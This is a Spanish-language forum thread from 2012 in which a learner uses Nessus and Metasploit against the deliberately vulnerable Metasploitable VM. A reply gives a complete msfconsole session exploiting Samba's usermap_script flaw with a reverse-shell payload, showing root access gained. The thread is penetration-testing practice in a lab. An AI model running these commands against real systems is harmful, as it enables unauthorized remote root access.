Prueba de nessus,metasploits, y vm metasploitable Algo no hago bien???

Iniciado por CATBro, 28 Junio 2012, 05:04 AM

0 Miembros y 1 Visitante están viendo este tema.

CATBro

Que tal ando aprendiendo a usar nessu,metasploits y varias cosas mas en fin, corri el nessus contra la maquina virtual que difunde rapid7 creo( metasploitable ) un resultado de nessus me dice lo siguiente:
CVE 2007-2446
La version de servidor samba de la maquina objetivo es vulnerable a un ataque de desbordamiento de buffer, y en el reporte me dice cual exploit usar con metasploits , entonces
tecleo:

#msfconsole
msf  use exploit/linux/samba/lsa_transnames_heap
msf  exploit(lsa_transnames_heap) > set RHOST X.X:X:.X
msf  exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/exec
msf  exploit(lsa_transnames_heap) > set CMD ifconfig
msf  exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST     192.168.1.107    yes       The target address
   RPORT      445                     yes       Set the SMB service port
   SMBPIPE   LSARPC              yes       The pipe name to use


Payload options (linux/x86/exec):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   ifconfig         yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   0   Linux vsyscall

msf  exploit(lsa_transnames_heap) > exploit

  • Creating nop sled....
  • Trying to exploit Samba with address 0xffffe410...
  • Connecting to the SMB service...
    [-] Exploit exception: This target is not a vulnerable Samba server (Samba 3.0.20-Debian)

    ?????Que hago mal??o es un positivo falso lo que me da nessus, porque hace mucho cuando andaba en mi epoca de aprender lo mas rapido posible corria el armitage desde BT y funcionaba solo!!! Jeje pero ahorita me muevo con debia alguna idea

    Saludos!


adastra

 El problema esta en el exploit que estas tratando de usar:


msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.1.34 yes The target address
RPORT 445 yes The target port
Exploit target:
Id Name
– —-
0 Automatic
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(usermap_script) > set LHOST 192.168.1.33
LHOST => 192.168.1.33
msf exploit(usermap_script) > exploit
  • Started reverse double handler
  • Accepted the first client connection...
  • Accepted the second client connection...
  • Command: echo rm6wOwiDrg4PM9Ug;
  • Writing to socket A
  • Writing to socket B
  • Reading from sockets...
  • Reading from socket B
  • B: "rm6wOwiDrg4PM9Ug\r\n"
  • Matching...
  • A is input...
  • Command shell session 4 opened (192.168.1.33:4444 -> 192.168.1.34:53107) at Wed May 18 00:40:18 +0200 2011
    uname -r
    2.6.24-16-server
    whoami
    root

Hace algunos meses escribí una serie de publicaciones sobre como explotar las vulnerabilidades que vienen incluidas en Metasploitable. La primera parte comienza aquí:


http://thehackerway.com/2011/06/17/penetrando-sistemas-bajo-plataforma-gnulinux-vulnerable-con-metasploit-framework-parte-i/


Por si te interesa conocer un poco más sobre como atacar una plataforma vulnerable.
Un Saludo.





CATBro

Llegando a mi casa lo pruebo tambien para leer los tutos que has hecho.
Ya mas comento que paso

Saludos 

CATBro

Que tal adastra probe el exploit que me diste funciono muchas gracias pero porque nessus me da uno y no funciona ?? viendo las opciones del exploit que me diste me daba en el puerto de destino el 139 que venia por default, y funciono?? luego lo cale con el 445 y tambien , al googlear sobre ese puerto 445 al parecer hay algun tipo de vulnerabilidad a explotar le investigare bien ya despues comento que encontre.Yo pensaba que samba corria en los puertos 137 a 139 pero no entiendo el 445
Otra cosa ando usando el metasploits pero cuando le doy
> search telnet o cualquie cosa no me da ningun resultado la busqueda porque??
Saludos